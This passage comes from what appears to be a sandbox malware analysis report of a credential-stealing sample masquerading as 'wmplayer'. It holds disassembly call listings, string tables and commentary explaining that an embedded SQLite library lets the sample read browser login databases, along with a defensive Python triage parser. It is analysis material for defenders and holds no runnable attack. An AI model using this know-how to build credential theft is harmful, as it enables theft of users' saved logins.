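    print("ascii only:    ", classify(scan_ascii_only(dump)))
```

On a real dump, feed the bytes of the .sdmp file to scan() with the base shown in the entry's "Offset:" field so the printed addresses line up with the xrefs in the report; the ASCII-only pass is kept only to show how much a narrow-string search misses.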
                                                                                            APIs
                                                                                            • wcschr.MSVCRT ref: 00413972
                                                                                            • wcscpy.MSVCRT ref: 00413982
                                                                                              • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                              • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                              • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                            • wcscpy.MSVCRT ref: 004139D1
                                                                                            • wcscat.MSVCRT ref: 004139DC
                                                                                            • memset.MSVCRT ref: 004139B8
                                                                                              • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                              • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                            • memset.MSVCRT ref: 00413A00
                                                                                            • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                                            • wcscat.MSVCRT ref: 00413A27
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                            • String ID: \systemroot
                                                                                            • API String ID: 4173585201-1821301763
                                                                                            • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                            • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                            • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                            • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                            • String ID: 0$6
                                                                                            • API String ID: 4066108131-3849865405
                                                                                            • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                            • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                            • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                            • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 004082EF
                                                                                              • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                            • memset.MSVCRT ref: 00408362
                                                                                            • memset.MSVCRT ref: 00408377
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$ByteCharMultiWide
                                                                                            • String ID:
                                                                                            • API String ID: 290601579-0
                                                                                            • Opcode ID: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                                                            • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                            • Opcode Fuzzy Hash: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                                                            • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: free$wcslen
                                                                                            • String ID:
                                                                                            • API String ID: 3592753638-3916222277
                                                                                            • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                                            • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                            • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                                            • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040A47B
                                                                                            • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                            • wcslen.MSVCRT ref: 0040A4BA
                                                                                            • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                            • wcslen.MSVCRT ref: 0040A4E0
                                                                                            • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpywcslen$_snwprintfmemset
                                                                                            • String ID: %s (%s)$YV@
                                                                                            • API String ID: 3979103747-598926743
                                                                                            • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                            • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                            • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                            • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                            APIs
                                                                                            • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                            • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                            • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Library$AddressFreeLoadMessageProc
                                                                                            • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                            • API String ID: 2780580303-317687271
                                                                                            • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                            • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                            • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                            • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                            APIs
                                                                                            • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                                            • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                                            • wcslen.MSVCRT ref: 0040A6B1
                                                                                            • wcscpy.MSVCRT ref: 0040A6C1
                                                                                            • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                                            • wcscpy.MSVCRT ref: 0040A6DB
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                            • String ID: Unknown Error$netmsg.dll
                                                                                            • API String ID: 2767993716-572158859
                                                                                            • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                            • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                            • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                            • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                            APIs
                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                            • wcscpy.MSVCRT ref: 0040DAFB
                                                                                            • wcscpy.MSVCRT ref: 0040DB0B
                                                                                            • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                              • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                            • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                            • API String ID: 3176057301-2039793938
                                                                                            • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                            • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                                            • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                            • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                                            Strings
                                                                                            • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                            • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                            • database %s is already in use, xrefs: 0042F6C5
                                                                                            • unable to open database: %s, xrefs: 0042F84E
                                                                                            • too many attached databases - max %d, xrefs: 0042F64D
                                                                                            • database is already attached, xrefs: 0042F721
                                                                                            • out of memory, xrefs: 0042F865
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpymemset
                                                                                            • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                            • API String ID: 1297977491-2001300268
                                                                                            • Opcode ID: bc1e043490782c929c709f26cda1c8b0ebc87db0ce4dfb41b9d8c8297906dfd0
                                                                                            • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                            • Opcode Fuzzy Hash: bc1e043490782c929c709f26cda1c8b0ebc87db0ce4dfb41b9d8c8297906dfd0
                                                                                            • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                            APIs
                                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EB3F
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000), ref: 0040EB5B
                                                                                            • memcpy.MSVCRT(?,0045A248,00000014), ref: 0040EB80
                                                                                            • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014), ref: 0040EB94
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC17
                                                                                            • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000), ref: 0040EC21
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC59
                                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                              • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                            • String ID: ($d
                                                                                            • API String ID: 1140211610-1915259565
                                                                                            • Opcode ID: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                                                                            • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                                            • Opcode Fuzzy Hash: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                                                                            • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                                            APIs
                                                                                            • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                            • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                            • GetLastError.KERNEL32 ref: 004178FB
                                                                                            • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$ErrorLastLockSleepUnlock
                                                                                            • String ID:
                                                                                            • API String ID: 3015003838-0
                                                                                            • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                            • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                            • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                            • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                            APIs
                                                                                            • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                                                            • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                                            • GetLastError.KERNEL32 ref: 0041855C
                                                                                            • Sleep.KERNEL32(00000064), ref: 00418571
                                                                                            • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                                            • GetLastError.KERNEL32 ref: 0041858E
                                                                                            • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                                            • free.MSVCRT ref: 004185AC
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$AttributesDeleteErrorLastSleep$free
                                                                                            • String ID:
                                                                                            • API String ID: 2802642348-0
                                                                                            • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                            • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                            • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                            • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                            APIs
                                                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                                                            • memset.MSVCRT ref: 00413ADC
                                                                                            • memset.MSVCRT ref: 00413AEC
                                                                                              • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                            • memset.MSVCRT ref: 00413BD7
                                                                                            • wcscpy.MSVCRT ref: 00413BF8
                                                                                            • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                            • String ID: 3A
                                                                                            • API String ID: 3300951397-293699754
                                                                                            • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                            • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                            • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                            • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                            • wcscpy.MSVCRT ref: 0040D1B5
                                                                                              • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                              • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                            • wcslen.MSVCRT ref: 0040D1D3
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                            • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                            • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                            • String ID: strings
                                                                                            • API String ID: 3166385802-3030018805
                                                                                            • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                            • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                            • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                            • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 00411AF6
                                                                                              • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                            • wcsrchr.MSVCRT ref: 00411B14
                                                                                            • wcscat.MSVCRT ref: 00411B2E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                            • String ID: AE$.cfg$General$EA
                                                                                            • API String ID: 776488737-1622828088
                                                                                            • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                            • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                                            • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                            • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040D8BD
                                                                                            • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                            • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                            • memset.MSVCRT ref: 0040D906
                                                                                            • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                            • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                              • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                              • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                            • String ID: sysdatetimepick32
                                                                                            • API String ID: 1028950076-4169760276
                                                                                            • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                            • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                            • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                            • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                            APIs
                                                                                            • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                                            • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                                            • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                                            • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                                            • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                                            • memset.MSVCRT ref: 0041BA3D
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy$memset
                                                                                            • String ID: -journal$-wal
                                                                                            • API String ID: 438689982-2894717839
                                                                                            • Opcode ID: dbb6fae49c61f74d6f433767b436fbd9ec9999f6e4b570cef93805d1319e1532
                                                                                            • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                            • Opcode Fuzzy Hash: dbb6fae49c61f74d6f433767b436fbd9ec9999f6e4b570cef93805d1319e1532
                                                                                            • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
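Several of the wmplayer records above fit together once the constants are decoded: the LockFile/UnlockFile pair locks one byte at offset 0x40000000, the memcpy calls append "-journal" and "-wal" to a path, and the string table carries the ATTACH error messages. Those are the fingerprints of a statically linked SQLite library (its Win32 VFS takes a 1-byte lock at PENDING_BYTE, 0x40000000, and names its side files with those suffixes), which is what a credential-recovery component needs to read browser login databases. The OpenProcess record's first argument, 0x410, is PROCESS_QUERY_INFORMATION | PROCESS_VM_READ. The helper below is an added triage example, not part of the Joe Sandbox report or of the sample's code: it parses record lines in the exact "API.MODULE(args), ref: VA" and "string, xrefs: VA" layout shown above and reports those findings. The sample input is an excerpt copied from the records on this page; the access-right values come from winnt.h and the PENDING_BYTE value is SQLite's default, both stated as assumptions in the code.

```python
"""Triage helper for Joe Sandbox function-listing records.

Added example (not from the report or the analysed sample).  It decodes the
OpenProcess desired-access mask and flags the fingerprints of an embedded
SQLite library: a 1-byte lock at PENDING_BYTE, the -journal/-wal side-file
suffixes and the ATTACH error strings.
"""
import re

# Constructed sample: API and string lines excerpted from the records above.
SAMPLE = """\
• LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
• Sleep.KERNEL32(00000001), ref: 004178E9
• UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
• OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
• memset.MSVCRT ref: 00413ADC
  • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
• memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
• memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
• cannot ATTACH database within transaction, xrefs: 0042F663
• too many attached databases - max %d, xrefs: 0042F64D
"""

# "API.MODULE(args), ref: VA"; subcall lines carry a "Part of subcall function" prefix.
_CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-F]{8}:\s*)?"
    r"(?P<api>[\w?@]+)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})"
)
# "string, xrefs: VA"
_STR_RE = re.compile(r"^\s*•\s*(?P<text>.*?), xrefs: (?P<ref>[0-9A-F]{8})\s*$")

# Assumed from winnt.h: process-specific access rights plus SYNCHRONIZE.
PROCESS_ACCESS = {
    0x0001: "PROCESS_TERMINATE",
    0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS",
    0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION",
    0x0400: "PROCESS_QUERY_INFORMATION",
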